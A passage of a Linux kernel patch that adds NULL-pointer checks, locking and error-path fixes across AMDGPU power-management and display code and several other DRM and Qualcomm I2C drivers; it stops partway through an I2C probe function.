+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+index 81549f1edfe01..5ee9211c503c4 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+@@ -956,6 +956,9 @@ static u32 amdgpu_virt_rlcg_reg_rw(struct amdgpu_device *adev, u32 offset, u32 v
+ 	scratch_reg1 = (void __iomem *)adev->rmmio + 4 * reg_access_ctrl->scratch_reg1;
+ 	scratch_reg2 = (void __iomem *)adev->rmmio + 4 * reg_access_ctrl->scratch_reg2;
+ 	scratch_reg3 = (void __iomem *)adev->rmmio + 4 * reg_access_ctrl->scratch_reg3;
++
++	mutex_lock(&adev->virt.rlcg_reg_lock);
++
+ 	if (reg_access_ctrl->spare_int)
+ 		spare_int = (void __iomem *)adev->rmmio + 4 * reg_access_ctrl->spare_int;
+ 
+@@ -1009,6 +1012,9 @@ static u32 amdgpu_virt_rlcg_reg_rw(struct amdgpu_device *adev, u32 offset, u32 v
+ 	}
+ 
+ 	ret = readl(scratch_reg0);
++
++	mutex_unlock(&adev->virt.rlcg_reg_lock);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
+index 2b9d806e23afb..dc6aaa4d67be7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
+@@ -260,6 +260,8 @@ struct amdgpu_virt {
+ 
+ 	/* the ucode id to signal the autoload */
+ 	uint32_t autoload_ucode_id;
++
++	struct mutex rlcg_reg_lock;
+ };
+ 
+ struct amdgpu_video_codec_info;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 31bae620aeffc..6189685af1fda 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2636,7 +2636,8 @@ static int dm_suspend(void *handle)
+ 
+ 		dm->cached_dc_state = dc_copy_state(dm->dc->current_state);
+ 
+-		dm_gpureset_toggle_interrupts(adev, dm->cached_dc_state, false);
++		if (dm->cached_dc_state)
++			dm_gpureset_toggle_interrupts(adev, dm->cached_dc_state, false);
+ 
+ 		amdgpu_dm_commit_zero_streams(dm->dc);
+ 
+@@ -6388,7 +6389,8 @@ static void create_eml_sink(struct amdgpu_dm_connector *aconnector)
+ 		aconnector->dc_sink = aconnector->dc_link->local_sink ?
+ 		aconnector->dc_link->local_sink :
+ 		aconnector->dc_em_sink;
+-		dc_sink_retain(aconnector->dc_sink);
++		if (aconnector->dc_sink)
++			dc_sink_retain(aconnector->dc_sink);
+ 	}
+ }
+ 
+@@ -7121,7 +7123,8 @@ static int amdgpu_dm_connector_get_modes(struct drm_connector *connector)
+ 				drm_add_modes_noedid(connector, 640, 480);
+ 	} else {
+ 		amdgpu_dm_connector_ddc_get_modes(connector, edid);
+-		amdgpu_dm_connector_add_common_modes(encoder, connector);
++		if (encoder)
++			amdgpu_dm_connector_add_common_modes(encoder, connector);
+ 		amdgpu_dm_connector_add_freesync_modes(connector, edid);
+ 	}
+ 	amdgpu_dm_fbc_init(connector);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index a9ddff774a978..b41a188007b8c 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -1255,6 +1255,9 @@ static bool is_dsc_need_re_compute(
+ 		}
+ 	}
+ 
++	if (new_stream_on_link_num == 0)
++		return false;
++
+ 	/* check current_state if there stream on link but it is not in
+ 	 * new request state
+ 	 */
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+index 179e1c593a53f..f3668911a88fd 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+@@ -928,7 +928,7 @@ static int pp_dpm_switch_power_profile(void *handle,
+ 		enum PP_SMC_POWER_PROFILE type, bool en)
+ {
+ 	struct pp_hwmgr *hwmgr = handle;
+-	long workload;
++	long workload[1];
+ 	uint32_t index;
+ 
+ 	if (!hwmgr || !hwmgr->pm_en)
+@@ -946,12 +946,12 @@ static int pp_dpm_switch_power_profile(void *handle,
+ 		hwmgr->workload_mask &= ~(1 << hwmgr->workload_prority[type]);
+ 		index = fls(hwmgr->workload_mask);
+ 		index = index > 0 && index <= Workload_Policy_Max ? index - 1 : 0;
+-		workload = hwmgr->workload_setting[index];
++		workload[0] = hwmgr->workload_setting[index];
+ 	} else {
+ 		hwmgr->workload_mask |= (1 << hwmgr->workload_prority[type]);
+ 		index = fls(hwmgr->workload_mask);
+ 		index = index <= Workload_Policy_Max ? index - 1 : 0;
+-		workload = hwmgr->workload_setting[index];
++		workload[0] = hwmgr->workload_setting[index];
+ 	}
+ 
+ 	if (type == PP_SMC_POWER_PROFILE_COMPUTE &&
+@@ -961,7 +961,7 @@ static int pp_dpm_switch_power_profile(void *handle,
+ 	}
+ 
+ 	if (hwmgr->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL)
+-		hwmgr->hwmgr_func->set_power_profile_mode(hwmgr, &workload, 0);
++		hwmgr->hwmgr_func->set_power_profile_mode(hwmgr, workload, 0);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
+index 1d829402cd2e2..f4bd8e9357e22 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
+@@ -269,7 +269,7 @@ int psm_adjust_power_state_dynamic(struct pp_hwmgr *hwmgr, bool skip_display_set
+ 						struct pp_power_state *new_ps)
+ {
+ 	uint32_t index;
+-	long workload;
++	long workload[1];
+ 
+ 	if (hwmgr->not_vf) {
+ 		if (!skip_display_settings)
+@@ -294,10 +294,10 @@ int psm_adjust_power_state_dynamic(struct pp_hwmgr *hwmgr, bool skip_display_set
+ 	if (hwmgr->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL) {
+ 		index = fls(hwmgr->workload_mask);
+ 		index = index > 0 && index <= Workload_Policy_Max ? index - 1 : 0;
+-		workload = hwmgr->workload_setting[index];
++		workload[0] = hwmgr->workload_setting[index];
+ 
+-		if (hwmgr->power_profile_mode != workload && hwmgr->hwmgr_func->set_power_profile_mode)
+-			hwmgr->hwmgr_func->set_power_profile_mode(hwmgr, &workload, 0);
++		if (hwmgr->power_profile_mode != workload[0] && hwmgr->hwmgr_func->set_power_profile_mode)
++			hwmgr->hwmgr_func->set_power_profile_mode(hwmgr, workload, 0);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+index 5e9410117712c..750b7527bdf83 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+@@ -2970,6 +2970,7 @@ static int smu7_update_edc_leakage_table(struct pp_hwmgr *hwmgr)
+ 
+ static int smu7_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ {
++	struct amdgpu_device *adev = hwmgr->adev;
+ 	struct smu7_hwmgr *data;
+ 	int result = 0;
+ 
+@@ -3006,40 +3007,37 @@ static int smu7_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 	/* Initalize Dynamic State Adjustment Rule Settings */
+ 	result = phm_initializa_dynamic_state_adjustment_rule_settings(hwmgr);
+ 
+-	if (0 == result) {
+-		struct amdgpu_device *adev = hwmgr->adev;
++	if (result)
++		goto fail;
+ 
+-		data->is_tlu_enabled = false;
++	data->is_tlu_enabled = false;
+ 
+-		hwmgr->platform_descriptor.hardwareActivityPerformanceLevels =
++	hwmgr->platform_descriptor.hardwareActivityPerformanceLevels =
+ 							SMU7_MAX_HARDWARE_POWERLEVELS;
+-		hwmgr->platform_descriptor.hardwarePerformanceLevels = 2;
+-		hwmgr->platform_descriptor.minimumClocksReductionPercentage = 50;
++	hwmgr->platform_descriptor.hardwarePerformanceLevels = 2;
++	hwmgr->platform_descriptor.minimumClocksReductionPercentage = 50;
+ 
+-		data->pcie_gen_cap = adev->pm.pcie_gen_mask;
+-		if (data->pcie_gen_cap & CAIL_PCIE_LINK_SPEED_SUPPORT_GEN3)
+-			data->pcie_spc_cap = 20;
+-		else
+-			data->pcie_spc_cap = 16;
+-		data->pcie_lane_cap = adev->pm.pcie_mlw_mask;
+-
+-		hwmgr->platform_descriptor.vbiosInterruptId = 0x20000400; /* IRQ_SOURCE1_SW_INT */
+-/* The true clock step depends on the frequency, typically 4.5 or 9 MHz. Here we use 5. */
+-		hwmgr->platform_descriptor.clockStep.engineClock = 500;
+-		hwmgr->platform_descriptor.clockStep.memoryClock = 500;
+-		smu7_thermal_parameter_init(hwmgr);
+-	} else {
+-		/* Ignore return value in here, we are cleaning up a mess. */
+-		smu7_hwmgr_backend_fini(hwmgr);
+-	}
++	data->pcie_gen_cap = adev->pm.pcie_gen_mask;
++	if (data->pcie_gen_cap & CAIL_PCIE_LINK_SPEED_SUPPORT_GEN3)
++		data->pcie_spc_cap = 20;
++	else
++		data->pcie_spc_cap = 16;
++	data->pcie_lane_cap = adev->pm.pcie_mlw_mask;
++
++	hwmgr->platform_descriptor.vbiosInterruptId = 0x20000400; /* IRQ_SOURCE1_SW_INT */
++	/* The true clock step depends on the frequency, typically 4.5 or 9 MHz. Here we use 5. */
++	hwmgr->platform_descriptor.clockStep.engineClock = 500;
++	hwmgr->platform_descriptor.clockStep.memoryClock = 500;
++	smu7_thermal_parameter_init(hwmgr);
+ 
+ 	result = smu7_update_edc_leakage_table(hwmgr);
+-	if (result) {
+-		smu7_hwmgr_backend_fini(hwmgr);
+-		return result;
+-	}
++	if (result)
++		goto fail;
+ 
+ 	return 0;
++fail:
++	smu7_hwmgr_backend_fini(hwmgr);
++	return result;
+ }
+ 
+ static int smu7_force_dpm_highest(struct pp_hwmgr *hwmgr)
+@@ -3329,8 +3327,7 @@ static int smu7_apply_state_adjust_rules(struct pp_hwmgr *hwmgr,
+ 			const struct pp_power_state *current_ps)
+ {
+ 	struct amdgpu_device *adev = hwmgr->adev;
+-	struct smu7_power_state *smu7_ps =
+-				cast_phw_smu7_power_state(&request_ps->hardware);
++	struct smu7_power_state *smu7_ps;
+ 	uint32_t sclk;
+ 	uint32_t mclk;
+ 	struct PP_Clocks minimum_clocks = {0};
+@@ -3347,6 +3344,10 @@ static int smu7_apply_state_adjust_rules(struct pp_hwmgr *hwmgr,
+ 	uint32_t latency;
+ 	bool latency_allowed = false;
+ 
++	smu7_ps = cast_phw_smu7_power_state(&request_ps->hardware);
++	if (!smu7_ps)
++		return -EINVAL;
++
+ 	data->battery_state = (PP_StateUILabel_Battery ==
+ 			request_ps->classification.ui_label);
+ 	data->mclk_ignore_signal = false;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
+index b015a601b385a..eb744401e0567 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
+@@ -1065,16 +1065,18 @@ static int smu8_apply_state_adjust_rules(struct pp_hwmgr *hwmgr,
+ 				struct pp_power_state  *prequest_ps,
+ 			const struct pp_power_state *pcurrent_ps)
+ {
+-	struct smu8_power_state *smu8_ps =
+-				cast_smu8_power_state(&prequest_ps->hardware);
+-
+-	const struct smu8_power_state *smu8_current_ps =
+-				cast_const_smu8_power_state(&pcurrent_ps->hardware);
+-
++	struct smu8_power_state *smu8_ps;
++	const struct smu8_power_state *smu8_current_ps;
+ 	struct smu8_hwmgr *data = hwmgr->backend;
+ 	struct PP_Clocks clocks = {0, 0, 0, 0};
+ 	bool force_high;
+ 
++	smu8_ps = cast_smu8_power_state(&prequest_ps->hardware);
++	smu8_current_ps = cast_const_smu8_power_state(&pcurrent_ps->hardware);
++
++	if (!smu8_ps || !smu8_current_ps)
++		return -EINVAL;
++
+ 	smu8_ps->need_dfs_bypass = true;
+ 
+ 	data->battery_state = (PP_StateUILabel_Battery == prequest_ps->classification.ui_label);
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
+index d8cd23438b762..f8333410cc3e4 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
+@@ -3263,8 +3263,7 @@ static int vega10_apply_state_adjust_rules(struct pp_hwmgr *hwmgr,
+ 			const struct pp_power_state *current_ps)
+ {
+ 	struct amdgpu_device *adev = hwmgr->adev;
+-	struct vega10_power_state *vega10_ps =
+-				cast_phw_vega10_power_state(&request_ps->hardware);
++	struct vega10_power_state *vega10_ps;
+ 	uint32_t sclk;
+ 	uint32_t mclk;
+ 	struct PP_Clocks minimum_clocks = {0};
+@@ -3282,6 +3281,10 @@ static int vega10_apply_state_adjust_rules(struct pp_hwmgr *hwmgr,
+ 	uint32_t stable_pstate_sclk = 0, stable_pstate_mclk = 0;
+ 	uint32_t latency;
+ 
++	vega10_ps = cast_phw_vega10_power_state(&request_ps->hardware);
++	if (!vega10_ps)
++		return -EINVAL;
++
+ 	data->battery_state = (PP_StateUILabel_Battery ==
+ 			request_ps->classification.ui_label);
+ 
+@@ -3419,13 +3422,17 @@ static int vega10_find_dpm_states_clocks_in_dpm_table(struct pp_hwmgr *hwmgr, co
+ 	const struct vega10_power_state *vega10_ps =
+ 			cast_const_phw_vega10_power_state(states->pnew_state);
+ 	struct vega10_single_dpm_table *sclk_table = &(data->dpm_table.gfx_table);
+-	uint32_t sclk = vega10_ps->performance_levels
+-			[vega10_ps->performance_level_count - 1].gfx_clock;
+ 	struct vega10_single_dpm_table *mclk_table = &(data->dpm_table.mem_table);
+-	uint32_t mclk = vega10_ps->performance_levels
+-			[vega10_ps->performance_level_count - 1].mem_clock;
++	uint32_t sclk, mclk;
+ 	uint32_t i;
+ 
++	if (vega10_ps == NULL)
++		return -EINVAL;
++	sclk = vega10_ps->performance_levels
++			[vega10_ps->performance_level_count - 1].gfx_clock;
++	mclk = vega10_ps->performance_levels
++			[vega10_ps->performance_level_count - 1].mem_clock;
++
+ 	for (i = 0; i < sclk_table->count; i++) {
+ 		if (sclk == sclk_table->dpm_levels[i].value)
+ 			break;
+@@ -3732,6 +3739,9 @@ static int vega10_generate_dpm_level_enable_mask(
+ 			cast_const_phw_vega10_power_state(states->pnew_state);
+ 	int i;
+ 
++	if (vega10_ps == NULL)
++		return -EINVAL;
++
+ 	PP_ASSERT_WITH_CODE(!vega10_trim_dpm_states(hwmgr, vega10_ps),
+ 			"Attempt to Trim DPM States Failed!",
+ 			return -1);
+@@ -4999,6 +5009,8 @@ static int vega10_check_states_equal(struct pp_hwmgr *hwmgr,
+ 
+ 	vega10_psa = cast_const_phw_vega10_power_state(pstate1);
+ 	vega10_psb = cast_const_phw_vega10_power_state(pstate2);
++	if (vega10_psa == NULL || vega10_psb == NULL)
++		return -EINVAL;
+ 
+ 	/* If the two states don't even have the same number of performance levels
+ 	 * they cannot be the same state.
+@@ -5132,6 +5144,8 @@ static int vega10_set_sclk_od(struct pp_hwmgr *hwmgr, uint32_t value)
+ 		return -EINVAL;
+ 
+ 	vega10_ps = cast_phw_vega10_power_state(&ps->hardware);
++	if (vega10_ps == NULL)
++		return -EINVAL;
+ 
+ 	vega10_ps->performance_levels
+ 	[vega10_ps->performance_level_count - 1].gfx_clock =
+@@ -5183,6 +5197,8 @@ static int vega10_set_mclk_od(struct pp_hwmgr *hwmgr, uint32_t value)
+ 		return -EINVAL;
+ 
+ 	vega10_ps = cast_phw_vega10_power_state(&ps->hardware);
++	if (vega10_ps == NULL)
++		return -EINVAL;
+ 
+ 	vega10_ps->performance_levels
+ 	[vega10_ps->performance_level_count - 1].mem_clock =
+@@ -5424,6 +5440,9 @@ static void vega10_odn_update_power_state(struct pp_hwmgr *hwmgr)
+ 		return;
+ 
+ 	vega10_ps = cast_phw_vega10_power_state(&ps->hardware);
++	if (vega10_ps == NULL)
++		return;
++
+ 	max_level = vega10_ps->performance_level_count - 1;
+ 
+ 	if (vega10_ps->performance_levels[max_level].gfx_clock !=
+@@ -5446,6 +5465,9 @@ static void vega10_odn_update_power_state(struct pp_hwmgr *hwmgr)
+ 
+ 	ps = (struct pp_power_state *)((unsigned long)(hwmgr->ps) + hwmgr->ps_size * (hwmgr->num_ps - 1));
+ 	vega10_ps = cast_phw_vega10_power_state(&ps->hardware);
++	if (vega10_ps == NULL)
++		return;
++
+ 	max_level = vega10_ps->performance_level_count - 1;
+ 
+ 	if (vega10_ps->performance_levels[max_level].gfx_clock !=
+@@ -5636,6 +5658,8 @@ static int vega10_get_performance_level(struct pp_hwmgr *hwmgr, const struct pp_
+ 		return -EINVAL;
+ 
+ 	vega10_ps = cast_const_phw_vega10_power_state(state);
++	if (vega10_ps == NULL)
++		return -EINVAL;
+ 
+ 	i = index > vega10_ps->performance_level_count - 1 ?
+ 			vega10_ps->performance_level_count - 1 : index;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 1d0693dad8185..91f0646eb3ee0 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -1834,7 +1834,7 @@ static int smu_adjust_power_state_dynamic(struct smu_context *smu,
+ {
+ 	int ret = 0;
+ 	int index = 0;
+-	long workload;
++	long workload[1];
+ 	struct smu_dpm_context *smu_dpm_ctx = &(smu->smu_dpm);
+ 
+ 	if (!skip_display_settings) {
+@@ -1874,10 +1874,10 @@ static int smu_adjust_power_state_dynamic(struct smu_context *smu,
+ 		smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM) {
+ 		index = fls(smu->workload_mask);
+ 		index = index > 0 && index <= WORKLOAD_POLICY_MAX ? index - 1 : 0;
+-		workload = smu->workload_setting[index];
++		workload[0] = smu->workload_setting[index];
+ 
+-		if (smu->power_profile_mode != workload)
+-			smu_bump_power_profile_mode(smu, &workload, 0);
++		if (smu->power_profile_mode != workload[0])
++			smu_bump_power_profile_mode(smu, workload, 0);
+ 	}
+ 
+ 	return ret;
+@@ -1927,7 +1927,7 @@ static int smu_switch_power_profile(void *handle,
+ {
+ 	struct smu_context *smu = handle;
+ 	struct smu_dpm_context *smu_dpm_ctx = &(smu->smu_dpm);
+-	long workload;
++	long workload[1];
+ 	uint32_t index;
+ 
+ 	if (!smu->pm_enabled || !smu->adev->pm.dpm_enabled)
+@@ -1940,17 +1940,17 @@ static int smu_switch_power_profile(void *handle,
+ 		smu->workload_mask &= ~(1 << smu->workload_prority[type]);
+ 		index = fls(smu->workload_mask);
+ 		index = index > 0 && index <= WORKLOAD_POLICY_MAX ? index - 1 : 0;
+-		workload = smu->workload_setting[index];
++		workload[0] = smu->workload_setting[index];
+ 	} else {
+ 		smu->workload_mask |= (1 << smu->workload_prority[type]);
+ 		index = fls(smu->workload_mask);
+ 		index = index <= WORKLOAD_POLICY_MAX ? index - 1 : 0;
+-		workload = smu->workload_setting[index];
++		workload[0] = smu->workload_setting[index];
+ 	}
+ 
+ 	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL &&
+ 		smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM)
+-		smu_bump_power_profile_mode(smu, &workload, 0);
++		smu_bump_power_profile_mode(smu, workload, 0);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/bridge/analogix/analogix_dp_reg.c b/drivers/gpu/drm/bridge/analogix/analogix_dp_reg.c
+index 6a4f20fccf841..7b0bc9704eacb 100644
+--- a/drivers/gpu/drm/bridge/analogix/analogix_dp_reg.c
++++ b/drivers/gpu/drm/bridge/analogix/analogix_dp_reg.c
+@@ -1027,7 +1027,6 @@ ssize_t analogix_dp_transfer(struct analogix_dp_device *dp,
+ 	u32 status_reg;
+ 	u8 *buffer = msg->buffer;
+ 	unsigned int i;
+-	int num_transferred = 0;
+ 	int ret;
+ 
+ 	/* Buffer size of AUX CH is 16 bytes */
+@@ -1079,7 +1078,6 @@ ssize_t analogix_dp_transfer(struct analogix_dp_device *dp,
+ 			reg = buffer[i];
+ 			writel(reg, dp->reg_base + ANALOGIX_DP_BUF_DATA_0 +
+ 			       4 * i);
+-			num_transferred++;
+ 		}
+ 	}
+ 
+@@ -1127,7 +1125,6 @@ ssize_t analogix_dp_transfer(struct analogix_dp_device *dp,
+ 			reg = readl(dp->reg_base + ANALOGIX_DP_BUF_DATA_0 +
+ 				    4 * i);
+ 			buffer[i] = (unsigned char)reg;
+-			num_transferred++;
+ 		}
+ 	}
+ 
+@@ -1144,7 +1141,7 @@ ssize_t analogix_dp_transfer(struct analogix_dp_device *dp,
+ 		 (msg->request & ~DP_AUX_I2C_MOT) == DP_AUX_NATIVE_READ)
+ 		msg->reply = DP_AUX_NATIVE_REPLY_ACK;
+ 
+-	return num_transferred > 0 ? num_transferred : -EBUSY;
++	return msg->size;
+ 
+ aux_error:
+ 	/* if aux err happen, reset aux */
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index 805f8455b8d64..4204d1f930137 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -4024,6 +4024,7 @@ static int drm_dp_mst_handle_up_req(struct drm_dp_mst_topology_mgr *mgr)
+ 	if (up_req->msg.req_type == DP_CONNECTION_STATUS_NOTIFY) {
+ 		const struct drm_dp_connection_status_notify *conn_stat =
+ 			&up_req->msg.u.conn_stat;
++		bool handle_csn;
+ 
+ 		drm_dbg_kms(mgr->dev, "Got CSN: pn: %d ldps:%d ddps: %d mcs: %d ip: %d pdt: %d\n",
+ 			    conn_stat->port_number,
+@@ -4032,6 +4033,16 @@ static int drm_dp_mst_handle_up_req(struct drm_dp_mst_topology_mgr *mgr)
+ 			    conn_stat->message_capability_status,
+ 			    conn_stat->input_port,
+ 			    conn_stat->peer_device_type);
++
++		mutex_lock(&mgr->probe_lock);
++		handle_csn = mgr->mst_primary->link_address_sent;
++		mutex_unlock(&mgr->probe_lock);
++
++		if (!handle_csn) {
++			drm_dbg_kms(mgr->dev, "Got CSN before finish topology probing. Skip it.");
++			kfree(up_req);
++			goto out;
++		}
+ 	} else if (up_req->msg.req_type == DP_RESOURCE_STATUS_NOTIFY) {
+ 		const struct drm_dp_resource_status_notify *res_stat =
+ 			&up_req->msg.u.resource_stat;
+diff --git a/drivers/gpu/drm/drm_client_modeset.c b/drivers/gpu/drm/drm_client_modeset.c
+index 9a65806047b5e..718acff90e2d3 100644
+--- a/drivers/gpu/drm/drm_client_modeset.c
++++ b/drivers/gpu/drm/drm_client_modeset.c
+@@ -873,6 +873,11 @@ int drm_client_modeset_probe(struct drm_client_dev *client, unsigned int width,
+ 
+ 			kfree(modeset->mode);
+ 			modeset->mode = drm_mode_duplicate(dev, mode);
++			if (!modeset->mode) {
++				ret = -ENOMEM;
++				break;
++			}
++
+ 			drm_connector_get(connector);
+ 			modeset->connectors[modeset->num_connectors++] = connector;
+ 			modeset->x = offset->x;
+diff --git a/drivers/gpu/drm/lima/lima_drv.c b/drivers/gpu/drm/lima/lima_drv.c
+index 39cab4a55f572..53ac94bdf475a 100644
+--- a/drivers/gpu/drm/lima/lima_drv.c
++++ b/drivers/gpu/drm/lima/lima_drv.c
+@@ -489,3 +489,4 @@ module_platform_driver(lima_platform_driver);
+ MODULE_AUTHOR("Lima Project Developers");
+ MODULE_DESCRIPTION("Lima DRM Driver");
+ MODULE_LICENSE("GPL v2");
++MODULE_SOFTDEP("pre: governor_simpleondemand");
+diff --git a/drivers/gpu/drm/mgag200/mgag200_i2c.c b/drivers/gpu/drm/mgag200/mgag200_i2c.c
+index 0c48bdf3e7f80..f5c5d06d0d4bb 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_i2c.c
++++ b/drivers/gpu/drm/mgag200/mgag200_i2c.c
+@@ -31,6 +31,8 @@
+ #include <linux/i2c.h>
+ #include <linux/pci.h>
+ 
++#include <drm/drm_managed.h>
++
+ #include "mgag200_drv.h"
+ 
+ static int mga_i2c_read_gpio(struct mga_device *mdev)
+@@ -86,7 +88,7 @@ static int mga_gpio_getscl(void *data)
+ 	return (mga_i2c_read_gpio(mdev) & i2c->clock) ? 1 : 0;
+ }
+ 
+-static void mgag200_i2c_release(void *res)
++static void mgag200_i2c_release(struct drm_device *dev, void *res)
+ {
+ 	struct mga_i2c_chan *i2c = res;
+ 
+@@ -115,7 +117,7 @@ int mgag200_i2c_init(struct mga_device *mdev, struct mga_i2c_chan *i2c)
+ 	i2c->adapter.algo_data = &i2c->bit;
+ 
+ 	i2c->bit.udelay = 10;
+-	i2c->bit.timeout = 2;
++	i2c->bit.timeout = usecs_to_jiffies(2200);
+ 	i2c->bit.data = i2c;
+ 	i2c->bit.setsda		= mga_gpio_setsda;
+ 	i2c->bit.setscl		= mga_gpio_setscl;
+@@ -126,5 +128,5 @@ int mgag200_i2c_init(struct mga_device *mdev, struct mga_i2c_chan *i2c)
+ 	if (ret)
+ 		return ret;
+ 
+-	return devm_add_action_or_reset(dev->dev, mgag200_i2c_release, i2c);
++	return drmm_add_action_or_reset(dev, mgag200_i2c_release, i2c);
+ }
+diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
+index 75b9c3f26bba6..cc957655cec24 100644
+--- a/drivers/i2c/busses/i2c-qcom-geni.c
++++ b/drivers/i2c/busses/i2c-qcom-geni.c
+@@ -88,6 +88,7 @@ struct geni_i2c_dev {
+ 	int cur_wr;
+ 	int cur_rd;
+ 	spinlock_t lock;
++	struct clk *core_clk;
+ 	u32 clk_freq_out;
+ 	const struct geni_i2c_clk_fld *clk_fld;
+ 	int suspended;
+@@ -100,6 +101,13 @@ struct geni_i2c_dev {
+ 	bool abort_done;
+ };
+ 
++struct geni_i2c_desc {
++	bool has_core_clk;
++	char *icc_ddr;
++	bool no_dma_support;
++	unsigned int tx_fifo_depth;
++};
++
+ struct geni_i2c_err_log {
+ 	int err;
+ 	const char *msg;
+@@ -763,6 +771,7 @@ static int geni_i2c_probe(struct platform_device *pdev)
+ 	u32 proto, tx_depth, fifo_disable;
+ 	int ret;
+ 	struct device *dev = &pdev->dev;
++	const struct geni_i2c_desc *desc = NULL;
+ 
+ 	gi2c = devm_kzalloc(dev, sizeof(*gi2c), GFP_KERNEL);
+ 	if (!gi2c)
+@@ -775,6 +784,14 @@ static int geni_i2c_probe(struct platform_device *pdev)
+ 	if (IS_ERR(gi2c->se.base))
+ 		return PTR_ERR(gi2c->se.base);
+ 
++	desc = device_get_match_data(&pdev->dev);
++
++	if (desc && desc->has_core_clk) {
++		gi2c->core_clk = devm_clk_get(dev, "core");
++		if (IS_ERR(gi2c->core_clk))
++			return PTR_ERR(gi2c->core_clk);
++	}
++
+ 	gi2c->se.clk = devm_clk_get(dev, "se");
+ 	if (IS_ERR(gi2c->se.clk) && !has_acpi_companion(dev))
+ 		return PTR_ERR(gi2c->se.clk);
+@@ -818,7 +835,7 @@ static int geni_i2c_probe(struct platform_device *pdev)
+ 	gi2c->adap.dev.of_node = dev->of_node;
+ 	strscpy(gi2c->adap.name, "Geni-I2C", sizeof(gi2c->adap.name));
+ 
+-	ret = geni_icc_get(&gi2c->se, "qup-memory");
++	ret = geni_icc_get(&gi2c->se, desc ? desc->icc_ddr : "qup-memory");
+ 	if (ret)
+ 		return ret;
+ 	/*
+@@ -828,36 +845,62 @@ static int geni_i2c_probe(struct platform_device *pdev)
+ 	 */
+ 	gi2c->se.icc_paths[GENI_TO_CORE].avg_bw = GENI_DEFAULT_BW;
+ 	gi2c->se.icc_paths[CPU_TO_GENI].avg_bw = GENI_DEFAULT_BW;
+-	gi2c->se.icc_paths[GENI_TO_DDR].avg_bw = Bps_to_icc(gi2c->clk_freq_out);
++	if (!desc || desc->icc_ddr)
++		gi2c->se.icc_paths[GENI_TO_DDR].avg_bw = Bps_to_icc(gi2c->clk_freq_out);
+ 
+ 	ret = geni_icc_set_bw(&gi2c->se);
+ 	if (ret)
+ 		return ret;
+ 
++	ret = clk_prepare_enable(gi2c->core_clk);
++	if (ret)
++		return ret;
++
+ 	ret = geni_se_resources_on(&gi2c->se);
+ 	if (ret) {
+ 		dev_err(dev, "Error turning on resources %d\n", ret);
